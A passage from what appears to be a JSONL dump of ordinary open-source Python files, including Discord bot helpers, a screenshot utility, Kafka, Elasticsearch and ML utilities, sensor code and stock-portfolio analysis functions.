than `{role}` in hierarchy.")\n    else:\n        return (\n            (mod.top_role.position > role.position) or mod == mod.guild.owner,\n            f"You are not higher than `{role}` in hierarchy.",\n        )\n\n\ndef humanize_roles(roles: list) -> str:\n    return humanize_list([f"`{role.name}`" for role in roles])\n\n\nasync def can_run_command(ctx: commands.Context, command: str) -> bool:\n    try:\n        result = await ctx.bot.get_command(command).can_run(ctx, check_all_parents=True)\n    except commands.CommandError:\n        result = False\n    return result\n","sub_path":"roleutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123242643","text":"class Solution:\n    def middleNode(self, head: ListNode) -> ListNode:\n        count=0\n        original=head\n        while head.next != None:\n            head=head.next\n            count+=1\n        \n        for i in range((count+1)//2):\n            original=original.next\n        \n        return original\n        \n        \n        \n","sub_path":"Middle of the Linked List.py","file_name":"Middle of the Linked List.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520338237","text":"import logging\nimport win32gui\nimport win32ui\nimport win32con\nimport win32api\nimport datetime\nimport re\nfrom PIL import Image, ImageDraw\n\nmodule_logger = logging.getLogger('application.CaptureScreen')\n\n\ndef get_current_time_date_to_string():\n    s_string = str(datetime.datetime.now())\n    s_string = re.sub(\":\", \"\", s_string)\n    return s_string\n\n\nclass CaptureScreen(object):\n\n    def __init__(self):\n        self.logger = logging.getLogger('application.CaptureScreen')\n        self.logger.debug('creating an instance of CaptureScreen')\n        self.width = 0\n        self.height = 0\n        self.src_up_left_x = 0\n        self.src_up_left_y = 0\n        self.file_name = \"\"\n        self.width_offset = 0\n        self.height_offset = 0\n        self.x_draw = 0\n        self.y_draw = 0\n        self.h_desktop = None\n        self.desktop_dc = None\n        self.img_dc = None\n        self.mem_dc = None\n        self.screen = None\n        self.rgba_image = None\n        self.image = None\n        self.ellipse_image = None\n        self.out = None\n        # radius of the circle for the mouse position\n        self.radius = 10\n\n    def set_capture_params(self, width, height, width_offset, height_offset):\n\n        self.file_name = get_current_time_date_to_string() + \".png\"\n        self.width = width\n        self.height = height\n        self.width_offset = width_offset\n        self.height_offset = height_offset\n        self.logger.debug('Setting Capture Params %s %s and offset %s %s ',\n                          self.width,\n                          self.height,\n                          self.width_offset,\n                          self.height_offset)\n\n    def set_cursor_draw(self, x_poz, y_poz):\n        # x position on the screenShoot\n        # ex:(x=80) = global mouse cursor pos(2000) - offset from the previous monitor(1920) from the left side.\n        self.x_draw = x_poz - self.width_offset\n        self.y_draw = y_poz - self.height_offset\n\n    # this function gets only visible monitors (not virtual)\n    def get_visible_monitors(self, ):\n        i = 0\n        try:\n            i = win32api.GetSystemMetrics(win32con.SM_CMONITORS)\n        except Exception as ex:\n            self.logger.debug('exception: %s', ex)\n        return i\n\n    # this function gets displayDeviceName \n    def enum_display_devices(self):\n        i = 0\n        while True:\n            try:\n                device = win32api.EnumDisplayDevices(None, i)\n                self.logger.debug('Count [%d] Device: %s DeviceName(%s) ', i, device.DeviceString, device.DeviceName)\n                i += 1\n            except Exception as ex:\n                self.logger.info('exception: %s', ex)\n                break\n        return i\n\n    def grab_handle(self):\n        
self.h_desktop = win32gui.GetDesktopWindow()\n return True\n\n def create_context(self):\n # A device context is a structure that defines a set of graphic objects and their associated attributes\n self.desktop_dc = win32gui.GetWindowDC(self.h_desktop)\n # return value is a handle to a device context for the specified window.\n self.img_dc = win32ui.CreateDCFromHandle(self.desktop_dc)\n\n def create_memory(self):\n # CreateCompatibleDC function creates a memory device context (DC) compatible with the specified device.\n # return value is the handle to a memory DC.\n self.mem_dc = self.img_dc.CreateCompatibleDC()\n\n def create_bitmap(self):\n self.screen = win32ui.CreateBitmap()\n self.screen.CreateCompatibleBitmap(self.img_dc, self.width, self.height)\n # self.screen.CreateCompatibleBitmap(self.img_dc, 640,480)\n self.mem_dc.SelectObject(self.screen)\n\n def copy_screen_to_memory(self, ):\n self.mem_dc.BitBlt(\n (0, 0),\n (self.width, self.height),\n self.img_dc,\n (self.width_offset,\n self.height_offset),\n win32con.SRCCOPY)\n\n # self.mem_dc.StretchBlt( (0, 0), (640,480), self.img_dc, (self.widthOffset, self.hightOffset),\n # (self.width,self.height), win32con.SRCCOPY)\n\n bmp_info = self.screen.GetInfo()\n bmp_int = self.screen.GetBitmapBits(True)\n\n self.image = Image.frombuffer(\n 'RGB',\n (bmp_info['bmWidth'], bmp_info['bmHeight']),\n bmp_int, 'raw', 'BGRX', 0, 1)\n # convert BGRX to RGBA\n self.rgba_image = self.image.convert('RGBA')\n\n # create new Image RGBA\n self.ellipse_image = Image.new('RGBA', self.image.size, (255, 255, 255, 0))\n\n # draw ellipse there\n d = ImageDraw.Draw(self.ellipse_image)\n d.ellipse((self.x_draw - self.radius,\n self.y_draw - self.radius,\n self.x_draw + self.radius,\n self.y_draw + self.radius),\n fill=(255, 0, 0, 128))\n\n # blend alpha screen shot with cursor point\n self.out = Image.alpha_composite(self.rgba_image, self.ellipse_image)\n\n return True\n\n def save_bitmap_to_file(self, ):\n # self.path = os.getcwd()\n # self.screen.SaveBitmapFile(self.mem_dc, \"D:\\\\Capture\\\\\"+ str(self.fileName))\n self.out.save(str(self.file_name), 'PNG')\n\n def free_objects(self):\n self.mem_dc.DeleteDC()\n win32gui.DeleteObject(self.screen.GetHandle())\n self.image.close()\n self.rgba_image.close()\n self.ellipse_image.close()\n","sub_path":"src/CaptureScreen.py","file_name":"CaptureScreen.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513774330","text":"import os\n\ndef get_template_path(path):\n file_path = os.path.join(os.getcwd(), path)\n if not os.path.exists(file_path):\n raise Exception(\"This is not valid path: \" + file_path)\n return file_path\n\ndef get_template(path):\n file_path = get_template_path(path)\n return open(file_path).read()\n\ndef render_template(template_string, data):\n return template_string.format(**data)\n\ndef test():\n file = 'newsletter-template.html'\n data = {\n \"welcome_message\" : \"Welcome!\",\n \"site_address\" : \"www.google.com\",\n \"name\" : \"Joao das Couves\",\n \"company\" : \"Arvere Inc\",\n \"email\" : \"zeh_das_couves@gmail.com\",\n \"reply_adress\" : \"arvers.inc@gmail.com\"\n }\n template_text = get_template(file)\n print(render_template(template_text, data))\n\n#test()","sub_path":"Python/email/template_loader.py","file_name":"template_loader.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"66124869","text":"import os\nimport time\nimport json\nimport numpy as np\n\nimport torch.nn as nn\n\nfrom numpy.random import uniform, normal, randint, choice\n\n\ndef save_results(r):\n date = time.strftime(\"%Y%m%d_%H%M%S\")\n filename = date + '_results.json'\n param_path = os.path.join('./results/', filename)\n with open(param_path, 'w') as fp:\n json.dump(r, fp, indent=4, sort_keys=True)\n\n\ndef find_key(params, partial_key):\n return next(v for k, v in params.items() if partial_key in k)\n\n\ndef sample_from(space):\n \"\"\"\n Sample a hyperparameter value from a distribution\n defined and parametrized in the list `space`.\n \"\"\"\n distrs = {\n 'choice': choice,\n 'randint': randint,\n 'uniform': uniform,\n 'normal': normal,\n }\n s = space[0]\n\n np.random.seed(int(time.time() + np.random.randint(0, 300)))\n\n log = s.startswith('log_')\n s = s[len('log_'):] if log else s\n\n quantized = s.startswith('q')\n s = s[1:] if quantized else s\n\n distr = distrs[s]\n if s == 'choice':\n return distr(space[1])\n samp = distr(space[1], space[2])\n if log:\n samp = np.exp(samp)\n if quantized:\n samp = round((samp / space[3]) * space[3])\n return samp\n\n\ndef str2act(a):\n if a == 'relu':\n return nn.ReLU()\n elif a == 'selu':\n return nn.SELU()\n elif a == 'elu':\n return nn.ELU()\n elif a == 'tanh':\n return nn.Tanh()\n elif a == 'sigmoid':\n return nn.Sigmoid()\n else:\n raise ValueError('[!] Unsupported activation.')\n\n\ndef prepare_dirs(dirs):\n for path in dirs:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view(self.shape, -1)\n\n\nclass AverageMeter(object):\n \"\"\"\n Computes and stores the average and\n current value.\n \"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"455524351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 5 19:45:14 2017\n\n@author: linhb\n\"\"\"\n# kafka-console-consumer.bat --zookeeper localhost:2181 --topic test\n# \nfrom kafka import KafkaConsumer \nconsumer = KafkaConsumer(bootstrap_servers='localhost:9092')\nconsumer.subscribe(['test'])\nfor message in consumer:\n print(message)","sub_path":"Tutorial_Python/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96561051","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@version: ??\n@author: liangliangyy\n@license: MIT Licence \n@contact: liangliangyy@gmail.com\n@site: https://www.lylinux.net/\n@software: PyCharm\n@file: documents.py\n@time: 2019-04-05 13:05\n\"\"\"\nimport time\nfrom blog.models import Article, Category, Tag\nfrom elasticsearch_dsl import Document, Date, Integer, Keyword, Text, Object, Boolean\n\nfrom django.conf import settings\n\nELASTICSEARCH_ENABLED = hasattr(settings, 'ELASTICSEARCH_DSL')\n\nfrom elasticsearch_dsl.connections import connections\n\nif ELASTICSEARCH_ENABLED:\n 
connections.create_connection(hosts=[settings.ELASTICSEARCH_DSL['default']['hosts']])\n\n\nclass ElapsedTimeDocument(Document):\n url = Text()\n time_taken = Integer()\n log_datetime = Date()\n type = Text(analyzer='ik_max_word')\n useragent = Text()\n\n class Index:\n name = 'performance'\n settings = {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n\n class Meta:\n doc_type = 'ElapsedTime'\n\n\nclass ElaspedTimeDocumentManager():\n\n @staticmethod\n def create(url, time_taken, log_datetime, type, useragent):\n if not hasattr(ElaspedTimeDocumentManager, 'mapping_created'):\n ElapsedTimeDocument.init()\n setattr(ElaspedTimeDocumentManager, 'mapping_created', True)\n doc = ElapsedTimeDocument(meta={'id': int(round(time.time() * 1000))}, url=url, time_taken=time_taken,\n log_datetime=log_datetime, type=type, useragent=useragent)\n doc.save()\n\n\nclass ArticleDocument(Document):\n body = Text(analyzer='ik_max_word')\n title = Text(analyzer='ik_max_word')\n author = Object(properties={\n 'nickname': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n category = Object(properties={\n 'name': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n tags = Object(properties={\n 'name': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n\n pub_time = Date()\n status = Text()\n comment_status = Text()\n type = Text()\n views = Integer()\n article_order = Integer()\n\n class Index:\n name = 'blog'\n settings = {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n\n class Meta:\n doc_type = 'Article'\n\n\nclass ArticleDocumentManager():\n\n def __init__(self):\n\n ArticleDocument.init()\n\n def create_index(self):\n ArticleDocument.init()\n\n def delete_index(self):\n from elasticsearch import Elasticsearch\n es = Elasticsearch()\n es.indices.delete(index='blog', ignore=[400, 404])\n\n def convert_to_doc(self, articles):\n return [ArticleDocument(meta={'id': article.id}, body=article.body, title=article.title,\n auth={\n 'nikename': article.author.username,\n 'id': article.author.id\n },\n category={\n 'name': article.category.name,\n 'id': article.category.id\n },\n tags=[{'name': t.name, 'id': t.id} for t in article.tags.all()],\n pub_time=article.pub_time,\n status=article.status,\n comment_status=article.comment_status,\n type=article.type,\n views=article.views,\n article_order=article.article_order\n ) for article in articles]\n\n def rebuild(self, articles=None):\n articles = articles if articles else Article.objects.all()\n docs = self.convert_to_doc(articles)\n for doc in docs:\n doc.save()\n\n def update_docs(self, docs):\n for doc in docs:\n doc.save()\n","sub_path":"apps/blog/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"114777995","text":"\"\"\"\n Module which contains the Message class heirarchy.\n\n CONCEPT:\n - Message classes represent the actual types of messages that are being\n transferred over the network by Iris\n - each Message class has two modes - binary and nonbinary\n - each Message class has two posses two methods that will enable the\n encoding and decoding from these two modes\n - Message classes have defined maximum sizes of messages\n\n FUTURE:\n - add persisting stuff - possibly as a mixing, messages have to be\n persisted for state-saving purposes\n - add id stuff - for identification of messages\n\"\"\"\n\nfrom iris.errors import (MessageInitError, MessageEncodingError,\n MessageDecodingError)\nfrom 
iris import utils\n\n\nclass BaseMessage:\n    \"\"\" Base class of Message class hierarchy.\n\n    Gives the overall skeleton which has to be inherited. \"\"\"\n\n    NONBINARY = 0\n    BINARY = 1\n\n\n    @staticmethod\n    def to_binary(message):\n        raise NotImplementedError\n\n    @staticmethod\n    def from_binary(message):\n        raise NotImplementedError\n\n    def __init__(self, payload, host, port):\n        if not utils.is_valid_address(host, port):\n            raise MessageInitError(\"Invalid address %s:%s was provided\"\n                                   % (str(host), str(port)))\n        if not payload:\n            raise MessageInitError(\"Cannot initialize without payload!\")\n        if type(payload) == bytes:\n            self._init_binary(payload, host, port)\n        else:\n            self._init_nonbinary(payload, host, port)\n\n    def _init_binary(self, payload, host, port):\n        raise NotImplementedError\n\n    def _init_nonbinary(self, payload, host, port):\n        raise NotImplementedError\n\n\nclass TextMessage(BaseMessage):\n    \"\"\" Base class of Message class sub-hierarchy that uses text payload.\n\n    Contains basic text strings as payload, with static methods\n    offering basic encoding and decoding of the payload \"\"\"\n\n    PAYLOAD_SIZE_BINARY = 1500\n\n\n    @staticmethod\n    def to_binary(message):\n        \"\"\" Responsible for encoding the message into BINARY mode, from\n        NONBINARY, in order to get it ready for transmission.\n\n        Can only be called with message in NONBINARY mode \"\"\"\n        if message.mode == BaseMessage.NONBINARY:\n            try:\n                # TODO - add encoding as class parameter\n                message.payload = message.payload.encode('UTF-8')\n            except UnicodeEncodeError as e:\n                raise MessageEncodingError(\"Failed to encode the payload: %s\"\n                                           % message.payload) from e\n            else:\n                message.mode = BaseMessage.BINARY\n                return message\n        else:\n            raise MessageEncodingError(\"Message must be in NONBINARY mode\")\n\n    @staticmethod\n    def from_binary(message):\n        \"\"\" Responsible for decoding the message into NONBINARY mode, from\n        BINARY, in order to get it ready for consumption by client.\n\n        Can only be called with message in BINARY mode \"\"\"\n        if message.mode == BaseMessage.BINARY:\n            try:\n                message.payload = message.payload.decode(\"UTF-8\")\n            except UnicodeDecodeError as e:\n                raise MessageDecodingError(\"Failed to decode the payload: %s\"\n                                           % message.payload) from e\n            else:\n                message.mode = BaseMessage.NONBINARY\n                return message\n        else:\n            raise MessageDecodingError(\"Message must be in BINARY mode\")\n\n    def _init_binary(self, payload, host, port):\n        self.payload = payload\n        self.address = host, port\n        self.mode = self.BINARY\n\n    def _init_nonbinary(self, payload, host, port):\n        if type(payload) == str:\n            self.payload = payload\n            self.address = host, port\n            self.mode = self.NONBINARY\n        else:\n            raise MessageInitError(\"Nonbinary TextMessages must have payload\"\n                                   \" of str type not: %s\" % str(type(payload)))\n","sub_path":"iris/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452385973","text":"# coding: utf-8\nimport time\nimport VL53L0X\nimport RPi.GPIO as GPIO\nimport sys\n# ROS node setup\n\n# GPIO for Sensor 1 shutdown pin\nsensor1_shutdown = 27\n# GPIO for Sensor 2 shutdown pin\nsensor2_shutdown = 17\n# GPIO for sensor 3 shutdown pin\nsensor3_shutdown = 22\nGPIO.setwarnings(False)\n\n# Setup GPIO for shutdown pins on each VL53L0X\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(sensor1_shutdown, GPIO.OUT)\nGPIO.setup(sensor2_shutdown, GPIO.OUT)\nGPIO.setup(sensor3_shutdown, GPIO.OUT)\n\n# Set all shutdown pins low to turn off each 
VL53L0X\nGPIO.output(sensor1_shutdown, GPIO.LOW)\nGPIO.output(sensor2_shutdown, GPIO.LOW)\nGPIO.output(sensor3_shutdown, GPIO.LOW)\n\n# Keep all low for 500 ms or so to make sure they reset\ntime.sleep(0.50)\n\n# Create one object per VL53L0X passing the address to give to\n# each.\ntof = VL53L0X.VL53L0X(address=0x2B)\ntof1 = VL53L0X.VL53L0X(address=0x2C)\ntof2 = VL53L0X.VL53L0X(address=0x2D)\n\n# Set shutdown pin high for the first VL53L0X then \n# call to start ranging \nGPIO.output(sensor1_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\n# Set shutdown pin high for the second VL53L0X then \n# call to start ranging \nGPIO.output(sensor2_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof1.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\nGPIO.output(sensor3_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof2.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\ntiming = tof.get_timing()\nif (timing < 20000):\n timing = 20000\nprint (\"Timing %d ms\" % (timing/1000))\n\nfor count in range(1, 101):\n print(\"normalized- %f\" % (tof2.normalized()))\ntof2.stop_ranging()\nGPIO.output(sensor3_shutdown, GPIO.LOW)\ntof1.stop_ranging()\nGPIO.output(sensor2_shutdown, GPIO.LOW)\ntof.stop_ranging()\nGPIO.output(sensor1_shutdown, GPIO.LOW)\n","sub_path":"2018/distancesensor/VL53L0X_rasp_python/python/VL53L0X_error_test.py","file_name":"VL53L0X_error_test.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94104635","text":"\"\"\"股票组合分析工具\"\"\"\nfrom FactorLib.data_source.base_data_source_h5 import data_source\nimport pandas as pd\nimport numpy as np\n\n\ndef format_benchmark(func):\n def wrapper(portfolio, benchmark, *args, **kwargs):\n assert isinstance(portfolio, (pd.Series, pd.DataFrame))\n if isinstance(portfolio, pd.Series):\n portfolio = portfolio.to_frame('portfolio_weight')\n if isinstance(benchmark, str):\n dates = portfolio.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_weight(ids=benchmark,\n dates=dates)\n portfolio, benchmark = portfolio.align(benchmark, axis='index', fill_value=0.0)\n return func(portfolio, benchmark, *args, **kwargs)\n return wrapper\n\n\n@format_benchmark\ndef cal_diversion(portfolio_weight, benchmark_weight):\n \"\"\"计算持仓权重与基准的偏离度\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark_weight: str or pd.DataFrame\n 基准权重\n \"\"\"\n diff = pd.DataFrame(data=np.abs(portfolio_weight.values-benchmark_weight.values),\n index=portfolio_weight.index,\n columns=['diversion'])\n return diff.groupby('date').sum()\n\n\n@format_benchmark\ndef cal_diversion_of_large_weight(portfolio_weight, benchmark_weight, n=10,\n base='portfolio'):\n \"\"\"计算前N大重仓股的权重偏离度\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark_weight: str or pd.DataFrame\n 基准权重\n\n n: int\n 取前N大重仓\n\n base: str\n 取值: portfolio or benchmark 以组合或者基准的重仓股为基准\n \"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n other_weight = benchmark_weight.reindex(base_weight.index)\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n other_weight = portfolio_weight.reindex(base_weight.index)\n diff = pd.DataFrame(data=np.abs(base_weight.values - 
other_weight.values),\n index=base_weight.index,\n columns=['diversion'])\n return diff.groupby('date').sum()\n\n\ndef cal_total_weight_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票权重之和\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').sum()\n\n\ndef cal_total_num_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票数量\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').size()\n\n\ndef cal_ratio_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票数量比例\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').size() / portfolio_weight.groupby('date').size()\n\n\n@format_benchmark\ndef compare_large_weight_with_benchmark(portfolio_weight, benchmark_weight, n=10, base='portfolio'):\n \"\"\"与基准比较权重股的权重\n\n Parameters:\n ------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n benchmark_weight: str or pd.DataFrame\n 基准权重\n n: int\n 取前N大重仓\n base: str\n 取值: portfolio or benchmark 以组合或者基准的重仓股为基准\n \"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = benchmark_weight.reindex(base_weight.index)\n other_weight.columns = ['benchmark']\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = portfolio_weight.reindex(base_weight.index)\n other_weight.columns = ['portfolio']\n diff = base_weight.join(other_weight)[['portfolio', 'benchmark']]\n diff['Diff'] = diff.portfolio - diff.benchmark\n return diff\n\n\n@format_benchmark\ndef compare_total_weight_with_benchmark(portfolio_weight, benchmark_weight, n=10, base='portfolio'):\n \"\"\"与基准比较权重股总权重的差别\"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = benchmark_weight.reindex(base_weight.index)\n other_weight.columns = ['benchmark']\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = 
[base]\n other_weight = portfolio_weight.reindex(base_weight.index)\n other_weight.columns = ['portfolio']\n diff = pd.concat([base_weight.groupby('date').sum(),\n other_weight.groupby('date').sum()], axis=1)[['portfolio', 'benchmark']]\n diff['Diff'] = diff.portfolio - diff.benchmark\n return diff\n\n\ndef cal_future_return(portfolio_weight, group=None, window_len='20d'):\n \"\"\"计算股票组合未来的收益率\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 组合的权重\n group: pd.Series\n 可以用来给组合权重分组的分类器\n window_len: str\n 未来的时间窗口\n \"\"\"\n def cal_weighted_ret(x, y):\n return x.dot(y)\n\n future_ret = data_source.get_forward_ndays_return(None, idx=portfolio_weight, windows=[1], freq=window_len)[1]\n grouper = ['date']\n if group is not None:\n grouper.append(group)\n weight_name = portfolio_weight.columns[0]\n a = portfolio_weight.groupby(grouper, group_keys=False)[weight_name].agg(\n lambda x: cal_weighted_ret(x.values, future_ret.reindex(x.index).values))\n return a\n\n\nif __name__ == '__main__':\n from alphalens.utils import quantize_factor\n p = data_source.sector.get_index_weight('000300', dates=['20170228'])\n p.columns = ['a']\n group = quantize_factor(p.rename(columns=lambda x: 'factor'), quantiles=10).rename(index={'asset': 'IDs'})\n print(cal_future_return(p, group=group))\n","sub_path":"QuantLib/portfolio_analyse.py","file_name":"portfolio_analyse.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441207513","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Meziane AITE, meziane.aite@inria.fr\nDescription:\nusage:\n reactions_to_SBML.py --padmetRef=FILE --reactions=FILE --output=FILE [-v]\n\noption:\n -h --help Show help.\n --padmetRef=FILE the padmet used as reference (ex: metacyc.padmet) \n --reactions=FILE file of reaction id. 
one by line.\n --output=FILE sbml output.\n -v print info\n\"\"\"\nfrom lib.sbmlGenerator import reactions_to_SBML\ntry:\n import docopt\nexcept ImportError:\n print(\"package docopt needed, use this cmd:\\n pip install \"\n + \"docopt\")\n exit()\n\n\ndef main():\n args = docopt.docopt(__doc__)\n padmetRef_file = args[\"--padmetRef\"]\n reactions_file = args[\"--reactions\"] \n output = args[\"--output\"]\n verbose = args[\"-v\"]\n\n reactions_to_SBML(reactions_file, output, padmetRef_file, verbose=verbose)\n \nif __name__ == \"__main__\":\n main()","sub_path":"aureme/reactions_to_SBML.py","file_name":"reactions_to_SBML.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63431430","text":"Total = 0\r\nWinner = 0\r\n\r\nfor i in range(1,6):\r\n a, b, c, d = map(int,input().split())\r\n Tot = a + b + c + d\r\n if Tot > Total:\r\n Winner = i\r\n Total = Tot\r\nprint(Winner, Total)\r\n","sub_path":"Open/Python 3/pet.py","file_name":"pet.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265927490","text":"import a3dc_module_interface as a3\nfrom modules.packages.a3dc.ImageClass import ImageClass\nfrom modules.a3dc_interface_utils import error\n \n\ndef module_main(ctx):\n \n try:\n a3.outputs['ChA Image']=ImageClass(a3.inputs['ChA Image'].image, a3.inputs['ChA Image'].metadata).to_multidimimage()\n a3.outputs['ChB Image']=ImageClass(a3.inputs['ChB Image'].image, a3.inputs['ChB Image'].metadata).to_multidimimage()\n a3.outputs['ChA Thresholded']=ImageClass(a3.inputs['ChA Thresholded'].image, a3.inputs['ChA Thresholded'].metadata).to_multidimimage()\n a3.outputs['ChB Thresholded']=ImageClass(a3.inputs['ChB Thresholded'].image, a3.inputs['ChB Thresholded'].metadata).to_multidimimage()\n\n\n except Exception as e:\n error(\"Error occured while executing '\"+str(ctx.type())+\"' module '\"+str(ctx.name())+\"' !\", exception=e)\n\n \ndef generate_config():\n\n #Set Outputs and inputs\n config=[a3.Input('ChA Image', a3.types.GeneralPyType), \n a3.Input('ChB Image', a3.types.GeneralPyType), \n a3.Input('ChA Thresholded', a3.types.GeneralPyType),\n a3.Input('ChB Thresholded', a3.types.GeneralPyType),\n a3.Output('ChA Image', a3.types.ImageFloat), \n a3.Output('ChB Image', a3.types.ImageFloat), \n a3.Output('ChA Thresholded', a3.types.ImageFloat),\n a3.Output('ChB Thresholded', a3.types.ImageFloat)] \n \n \n return config\n\na3.def_process_module(generate_config(), module_main)\n\n","sub_path":"src/app/modules/thresholding/module_Thresholding_Results.py","file_name":"module_Thresholding_Results.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40957877","text":"#!/usr/bin/env python3\n\n'''\nModel for Common Spatial Pattern (CSP) feature extraction and channel selection.\n'''\n\nimport os\nimport numpy as np\nimport time\n\n# import self defined functions\n# import get_data as get\nfrom filters import load_filterbank\nfrom csp import generate_projection,generate_eye,extract_feature\nfrom ranking import dimension_reduction, channel_selection_csprank, channel_selection_squared_sum\n\n__author__ = \"Michael Hersche, Tino Rellstab, Tianhong Gan\"\n__email__ = \"herschmi@ethz.ch, tinor@ethz.ch, tianhonggan@outlook.com\"\n\nresults_dir=f'results'\nos.makedirs(f'{results_dir}', exist_ok=True)\n\nclass CSP_Model:\n\tdef 
